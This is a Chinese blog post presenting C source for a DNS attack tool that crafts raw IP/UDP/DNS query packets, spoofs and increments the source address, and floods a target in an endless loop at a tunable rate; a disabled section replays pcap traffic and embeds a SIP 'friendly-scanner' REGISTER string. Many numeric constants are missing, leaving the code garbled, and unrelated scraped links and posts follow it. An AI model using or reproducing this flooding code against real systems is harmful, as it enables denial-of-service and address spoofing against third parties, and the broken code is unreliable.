dns攻击包代码实现
博客地址:http://home.cnblogs.com/u/zengjianrong/
代码没有做好精简,有些多余的没有删去,因为博主太懒了哈哈
#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/time.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/if_ether.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <sys/ioctl.h> #define WORD unsigned short
#define DWORD unsigned long typedef struct ip_hdr
{
unsigned char ip_verlen; // IP version & length
unsigned char ip_tos; // IP type of service
unsigned short ip_totallength; // Total length
unsigned short ip_id; // Unique identifier
unsigned short ip_offset; // Fragment offset field
unsigned char ip_ttl; // Time to live
unsigned char ip_protocol; // Protocol(TCP, UDP, etc.)
unsigned short ip_checksum; // IP checksum
unsigned int ip_srcaddr; // Source address
unsigned int ip_destaddr;
}IP_HDR;
typedef struct tcp_hdr
{
unsigned short sport;
unsigned short dport;
unsigned int seqnum;
unsigned int acknum;
unsigned char DataOffset;
unsigned char Flags;
unsigned short Windows;
unsigned short Checksum;
unsigned short UrgPointer;
}TCP_HDR; typedef struct udp_head
{
unsigned short sport;
unsigned short dport;
unsigned short len;
unsigned short Checksum;
}UDP_HDR; typedef struct ps_hdr
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
}PS_HDR; typedef struct {
unsigned short id; //标识,通过它客户端可以将DNS的请求与应答相匹配;
unsigned short flags; //标志:(查询)0x0100 (应答)0x8180 这些数字都是主机序
unsigned short questions; //问题数目
unsigned short answers; //资源记录数目
unsigned short author; //授权资源记录数目
unsigned short addition; //额外资源记录数目
}DNS_HDR; #define MAX_BUF_LEN 30*1024*1024 int socketid = -;
unsigned short checksum(unsigned short *buffer, int size)
{
unsigned long cksum=;
while (size > )
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size)
{
cksum += *(unsigned char*)buffer;
}
cksum = (cksum>>)+(cksum&0xffff);
cksum += (cksum>>);
return (unsigned short)(~cksum);
} void makerawpacket(unsigned char *buffer, int len, unsigned char *ucSIp, unsigned char *ucDIp, unsigned int k)
{
IP_HDR ipheader;
TCP_HDR tcp_header;
UDP_HDR udp_header;
DNS_HDR dns_header;
unsigned long dwFromIP = inet_addr(ucSIp);
unsigned long dwToIP = inet_addr(ucDIp); dwFromIP += htonl(k);
char tcpCheckBuf[];
PS_HDR pseudo_header; memcpy(&ipheader,buffer+,sizeof(IP_HDR));
ipheader.ip_srcaddr=(dwFromIP);
ipheader.ip_destaddr=dwToIP;
ipheader.ip_checksum = 0xffff;
ipheader.ip_checksum=checksum((unsigned short *)&ipheader,);
memcpy(&udp_header,buffer++sizeof(IP_HDR),sizeof(UDP_HDR));
udp_header.Checksum= 0xffff; pseudo_header.source_address =ipheader.ip_srcaddr ;
pseudo_header.dest_address =ipheader.ip_destaddr ;
pseudo_header.placeholder = ;
pseudo_header.protocol = 0x11;
pseudo_header.tcp_length = htons(sizeof(udp_header)+len);
memcpy(tcpCheckBuf,&pseudo_header,sizeof(pseudo_header));
memcpy(tcpCheckBuf+sizeof(pseudo_header),&udp_header,sizeof(udp_header));
memcpy(tcpCheckBuf+sizeof(pseudo_header)+sizeof(udp_header),buffer++sizeof(ipheader)+sizeof(udp_header),len);
udp_header.Checksum = checksum((unsigned short*)(tcpCheckBuf),sizeof(pseudo_header)+sizeof(udp_header)+len);
memcpy(buffer+,&ipheader,sizeof(ipheader));
memcpy(buffer++sizeof(ipheader),&udp_header,sizeof(udp_header));
} #if 0 /* Modified by zengjianrong on 2014年12月15日14时 */
int nSendAttackPacketFromPcap(FILE *fp)
{
int nGetLen = ;
static int RetLen = ;
int CheckIndex = ;
static unsigned char *readbuf;
int i;
unsigned char MacBuf[] = {/*main mac*/0x00 ,0x21 ,0xf2 ,0x00 ,0x00 ,0x06,/*extend mac*/0x78 ,0x8c ,0x54 ,0x33 ,0xbb ,0x7b,0x08,0x00};
IP_HDR iphead;
UDP_HDR udphead;
unsigned char sendBuf[];
int sendlen = ;
struct sockaddr addr;
int nPacket = ;
unsigned char RealMacBuf[] = {/*main mac*/0x00,0x21,0xF2,0x00,0x0A,0x29,/*extend mac*/0x00,0x0C,0x29,0x66,0xB0,0x45,0x08,0x00};
static int firstcall = ; #if 1 /*Modified by kcr, 2014-11-24*/
if (==firstcall)
{
printf("nSendAttackPacketFromPcap first call\n");
readbuf = malloc(MAX_BUF_LEN);
if (NULL==readbuf)
return -;
RetLen = fread(readbuf,,MAX_BUF_LEN,fp);
printf("read %d\n",RetLen);
fclose(fp);
}
firstcall = ; memcpy(sendBuf,RealMacBuf,);
CheckIndex = ;
while(CheckIndex<(RetLen-))
{
/*printf("%02x ",readbuf[CheckIndex]);*/ /*Modified by kcr,2014-11-13*/
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
if (readbuf[CheckIndex]!=MacBuf[])
{
CheckIndex++;
continue;
}
CheckIndex++;
nPacket++;
/*MAC match*/
memset(&iphead,,sizeof(IP_HDR));
memset(&udphead,,sizeof(UDP_HDR));
memcpy(&iphead,&readbuf[CheckIndex],sizeof(IP_HDR));
CheckIndex += sizeof(IP_HDR);
memcpy(&udphead,&readbuf[CheckIndex],sizeof(UDP_HDR));
CheckIndex += sizeof(UDP_HDR); udphead.sport = htons();
memcpy(sendBuf,RealMacBuf,);
memcpy(sendBuf+,&iphead,sizeof(IP_HDR));
memcpy(sendBuf++sizeof(IP_HDR),&udphead,sizeof(UDP_HDR));
sendlen = ntohs(udphead.len)-;
memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR),&readbuf[CheckIndex],sendlen);
CheckIndex += sendlen;
makerawpacket(sendBuf,sendlen, , , );
memset(&addr, , sizeof(addr));
strcpy(addr.sa_data, "eth2");
if (sendto(socketid, sendBuf, +sizeof(IP_HDR)+sizeof(UDP_HDR)+sendlen, , &addr, sizeof(addr)) < )
{
}
usleep();
}
return nGetLen;
#else "REGISTER sip:61.144.88.146 SIP/2.0\r\n\
Via: SIP/2.0/UDP 5.196.76.190:;branch=z9hG4bK-;rport\r\n\
Content-Length: \r\n\
From: \"7608\" <sip:7608@61.144.88.146>;tag=%10d\r\n\
Accept: application/sdp\r\n\
User-Agent: friendly-scanner\r\n\
To: \"7608\" <sip:7608@61.144.88.146>\r\n\
Contact: sip:@1.1.1.1\r\n\
CSeq: REGISTER\r\n\
Call-ID: %10d\r\n\
Max-Forwards: \r\n\r\n" #endif /*End of Modified by kcr*/ /*free(readbuf);*/ /*Modified by kcr,2014-10-16*/
}
#endif /* #if 0, End of Modified by zengjianrong on 2014年12月15日14时 */ int vp_CreatTask(void (*funcptr)(),void *argv)
{
pthread_attr_t attr;
int ret;
size_t stacksize = ;
int tid;
struct sched_param prv_priority;
int sched_policy;
int error; memset(&attr,,sizeof(pthread_attr_t));
ret=pthread_attr_init(&attr); stacksize = /*PTHREAD_STACK_MIN*3*/*;
ret = pthread_attr_setstacksize(&attr, stacksize); #if 0 /*Modified by kcr, 2014-03-12*/
pthread_attr_getschedparam( &attr, &prv_priority); sched_policy = SCHED_FIFO;
pthread_attr_setschedpolicy( &attr, sched_policy ); prv_priority.sched_priority = ;
pthread_attr_setschedparam( &attr, &prv_priority);
#endif /*End of Modified by kcr*/ ret = pthread_create((pthread_t *)&tid,&attr,(void *)funcptr, argv); return ret;
} int nSendAttackPacket(unsigned char *ucSIp, unsigned char *ucDIp, unsigned char *RealMacBuf, unsigned int unMaxCnt)
{
int nGetLen = ;
int CheckIndex = ;
unsigned int k;
IP_HDR iphead;
UDP_HDR udphead;
DNS_HDR dns_header;
unsigned char dnsQueries[]={
/*08 6c 65 61 73 65 77 65
62 03 63 6f 6d 00 00 01
00 01*/
0x08, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x77, 0x65,
0x62, 0x03, 0x63, 0x6f, 0x6d, 0x00, 0x00, 0x01,
0x00, 0x01,
0x00, 0x00, 0x29, 0x23, 0x28, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00};
unsigned char sendBuf[];
int sendlen = ;
struct sockaddr addr;
int nPacket = ;
unsigned int unCnt = ;
unsigned int unCnt_2 = ;
memcpy(sendBuf,RealMacBuf,); memset(&iphead,,sizeof(IP_HDR));
iphead.ip_verlen = 0x45;
iphead.ip_tos = ;
iphead.ip_totallength = htons(0x45);
iphead.ip_id = htons(0x9045);
iphead.ip_offset = ;
iphead.ip_ttl = ;
iphead.ip_protocol = ; /* udp */ memset(&udphead,,sizeof(UDP_HDR));
udphead.sport = htons();
udphead.dport = htons(0x35); /* dns */
udphead.len = htons(0x31);
udphead.Checksum = 0x0; memset(&dns_header, , sizeof(DNS_HDR));
dns_header.id = htons(0xd2ce);
dns_header.flags = htons(0x0100); //标志:(查询)0x0100 (应答)0x8180 这些数字都是主机序
dns_header.questions = htons(); //问题数目
dns_header.answers = ; //资源记录数目
dns_header.author = ; //授权资源记录数目
dns_header.addition = htons(); memcpy(sendBuf,RealMacBuf,);
memcpy(sendBuf+,&iphead,sizeof(IP_HDR));
memcpy(sendBuf++sizeof(IP_HDR),&udphead,sizeof(UDP_HDR));
memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR), &dns_header, sizeof(dns_header)); memcpy(sendBuf++sizeof(IP_HDR)+sizeof(UDP_HDR)+sizeof(dns_header),
&dnsQueries, sizeof(dnsQueries)); memset(&addr, , sizeof(addr));
strcpy(addr.sa_data, "eth1");
k=;
//printf("func:%s,line:%d, delay Cnt=0x%x\n", __FUNCTION__, __LINE__, unMaxCnt);
while ()
{
makerawpacket(sendBuf,sizeof(dns_header)+, ucSIp, ucDIp, k);
k++;
if (sendto(socketid, sendBuf, +sizeof(IP_HDR)+sizeof(UDP_HDR)+sizeof(dns_header)+, , &addr, sizeof(addr)) < )
{
}
//usleep(20); #if 1 /* Modified by zengjianrong on 2014年12月12日17时 */
unCnt = ;
while(unMaxCnt > unCnt)
{
unCnt ++;
}
#endif /* #if 0, End of Modified by zengjianrong on 2014年12月12日17时 */
} return ;
/*free(readbuf);*/ /*Modified by kcr,2014-10-16*/
} void RecvRespond(void)
{
int socket_fd;
unsigned char Buf[];
struct sockaddr_in LocalAddr;
struct sockaddr_in RemoteAddr;
fd_set recset;
struct timeval wait;
int nBytes;
int RemoteAddrLen =sizeof(struct sockaddr_in); socket_fd = socket(AF_INET, SOCK_DGRAM, );
memset(&LocalAddr, , sizeof(struct sockaddr_in));
LocalAddr.sin_family = AF_INET;
LocalAddr.sin_addr.s_addr = htonl(INADDR_ANY);
LocalAddr.sin_port = htons(); bind(socket_fd, (struct sockaddr *)&(LocalAddr), sizeof(struct sockaddr)); while()
{
memset(&recset, , sizeof(fd_set));
FD_SET(socket_fd, &recset); memset(&RemoteAddr, , sizeof(struct sockaddr_in)); wait.tv_sec = ;
wait.tv_usec = ;
nBytes = select(FD_SETSIZE, &recset, , , &wait);
if(nBytes>)
{
nBytes = recvfrom(socket_fd,Buf,,, (struct sockaddr *)&RemoteAddr,&RemoteAddrLen);
}
}
} void str2mac(unsigned char *ucInput, unsigned char *ucOutput)
{
unsigned char ucTemp = ;
int i = , j = , k = ;
do
{
//printf("func:%s,line:%d,0x%x. \n", __FUNCTION__, __LINE__, ucInput[i]);
if ((':' == ucInput[i]) || ('\0' == ucInput[i]))
{
ucOutput[j] = ucTemp;
j ++;
k = ;
}
else
{
if ( == k)
{
if (ucInput[i]>='' && ucInput[i] <= '')
ucTemp = ucInput[i] - '';
else
ucTemp = ucInput[i] - 'a' + ;
}
else
{
if (ucInput[i]>='' && ucInput[i] <= '')
ucTemp = (ucTemp<<) | (ucInput[i] - '');
else
ucTemp = (ucTemp<<) | (ucInput[i] - 'a' + );
}
k = ;
}
}while ('\0' != ucInput[i++]); } /*
Delay = 100000000,大约为4个,
Delay = 10000000,大约为40个,
Delay = 1000000,大约为360个,
Delay = 100000,大约为2930个,
Delay = 10000,大约为6500个,
Delay = 0,大约为5w多个,
*/
int main(int argc,void *argv[])
{
int optval = ;
unsigned char RealMacBuf[];
#if 0 /* Modified by zengjianrong on 2014年12月2日15时 */
FILE *fp; if(argc<)
return ; printf("open file %s\n",argv[]);
fp = fopen(argv[],"rb+");
if(NULL==fp)
{
printf("Can't open file %s\n",argv[]);
return ;
}
#endif /* #if 0, End of Modified by zengjianrong on 2014年12月2日15时 */
if ( > argc)
{
printf("eg.: ./attack sip smac dip dmac delay\n");
return -;
}
memset(RealMacBuf, , ); str2mac(argv[], &(RealMacBuf[]));
str2mac(argv[], RealMacBuf);
RealMacBuf[] = 0x08;
RealMacBuf[] = 0x00; printf("create socket\n");
if ((socketid = socket (PF_PACKET, SOCK_PACKET, htons(0x800))) == -) {
return -;
}
printf("set SO_BROADCAST\n");
if (setsockopt(socketid, SOL_SOCKET, SO_BROADCAST, &optval, sizeof(optval)) == -) {
close(socketid);
return -;
} vp_CreatTask(RecvRespond,);
while()
{
nSendAttackPacket(argv[], argv[], RealMacBuf, strtoul(argv[], NULL, ));
/*printf("loop back\n");*/ /*Modified by kcr,2014-11-24*/
//usleep(100000); /*Modified by kcr,2014-11-13*/
}
}
dns攻击包代码实现的更多相关文章
- DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器
DNS反射放大攻击分析 摘自:http://www.shaojike.com/2016/08/19/DNS%E6%94%BE%E5%A4%A7%E6%94%BB%E5%87%BB%E7%AE%80%E ...
- 什么是DNS攻击?它是如何工作的?
什么是DNS攻击?它是如何工作的? DNS攻击是一种利用域名系统中的弱点或漏洞的网络攻击.今天,互联网已成为我们生活中不可或缺的一部分.从社交到金融.购物再到旅游,我们生活的方方面面都是互联网.由于互 ...
- DNS攻击
DNS攻击 实验是基于Linux系统,配置了bind9服务的机器 大纲 本地修改Host文件重定向路径到指定地址 对User的DNS查询进行欺骗攻击 在同一局域网下,对DNS服务器的DNS查询进行欺骗 ...
- web攻击之六:DNS攻击原理与防范
随着网络的逐步普及,网络安全已成为INTERNET路上事实上的焦点,它关系着INTERNET的进一步发展和普及,甚至关系着INTERNET的生存.可喜的是我们那些互联网专家们并没有令广大INTERNE ...
- 《DNS攻击防范科普系列2》 -DNS服务器怎么防DDoS攻击
在上个系列<你的DNS服务真的安全么?>里我们介绍了DNS服务器常见的攻击场景,看完后,你是否对ddos攻击忧心重重?本节我们来告诉你,怎么破局!! 首先回顾一下DDoS攻击的原理.DDo ...
- DNS 攻击方式及攻击案例
[赛迪网-IT技术报道]2010年1月12日晨7时起,网络上开始陆续出现百度出现无法访问的情况反馈, 12时左右基本恢复正常:18时许百度发布官方版本公告:对事故原因说明为:"因www.ba ...
- 一个DNS数据包的惊险之旅
踏上旅程 “小子,快去查一下www.paypal.com的IP地址,我急用,晚了我弄你!”,暴躁老哥一把关上了门,留我一个DNS数据包在冷冰冰的房间. 过了一会儿,一位大叔打开了门,带着我来到了一座叫 ...
- 用wiershark抓dns数据包
wireshark是非常好的抓包工具,捕获工具也很强大.比如说我只要抓dns数据包,其他数据包全部丢弃. 步骤如下: 选择菜单->捕获-捕获接口-输入-所选择接口的捕获过滤器:port 53 1 ...
- 常见的DNS攻击——偷(劫持)、骗(缓存投毒)、打(DDos)
常见的DNS攻击包括: 1) 域名劫持 通过采用黑客手段控制了域名管理密码和域名管理邮箱,然后将该域名的NS纪录指向到黑客可以控制的DNS服务器,然后通过在该DNS服务器上添加相应域名纪录,从而使网民 ...
随机推荐
- JDK1.8 Stream
Java 8 API添加了一个新的抽象称为流Stream,可以让你以一种声明的方式处理数据. Stream 使用一种类似用 SQL 语句从数据库查询数据的直观方式来提供一种对 Java 集合运算和表达 ...
- RabbitMQ、RPC、SaltStack "贡"具的使用
消息队列 使用队列的场景 在程序系统中,例如外卖系统,订单系统,库存系统,优先级较高 发红包,发邮件,发短信,app消息推送等任务优先级很低,很适合交给消息队列去处理,以便于程序系统更快的处理其他请求 ...
- jQuery 选择器有61种你都知道了多少
下面列举了61种jQuery 选择器 参考 选择器 语句 描述 * $("*") 选择所有元素 #id $("#lastname") id=“lastname” ...
- 微信小程序使用函数防抖解决重复点击消耗性能问题
wxml: <view bindtap="doubleTap" bindtouchstart="touchStart" bindtouchend=&quo ...
- element-ui Upload 上传组件源码分析整理笔记(十四)
简单写了部分注释,upload-dragger.vue(拖拽上传时显示此组件).upload-list.vue(已上传文件列表)源码暂未添加多少注释,等有空再补充,先记下来... index.vue ...
- access truncate
access int access(const char *pathname, int mode); 确定文件或文件夹的访问权限 //unistd.h #define R_OK 4 /* Test f ...
- ios问题笔记
32位 最多内存0到3G 64位 最多内存0到8G iOS模板code4app.com github.com developer.apple.con 动画 label不能变小 只能变大,(而uivie ...
- Java并行程序基础。
并发,就是用多个执行器(线程)来完成一个任务(大任务)来处理业务(提高效率)的方法.而在这个过程中,会涉及到一些问题,所以学的就是解决这些问题的方法. 线程的基本操作: 1.创建线程:只需要new一个 ...
- python之便携式mysql类和tornado mysql长链接
mymysql.py class MyMysql2(object): def __init__(self, host = '', user = '', passwd = '', db = '', po ...
- Jmeter接口测试,变量是订单和订单明细,怎么一起传?
", "price": 12.0, "orderDate": "2019-07-05 10:40:00", "order ...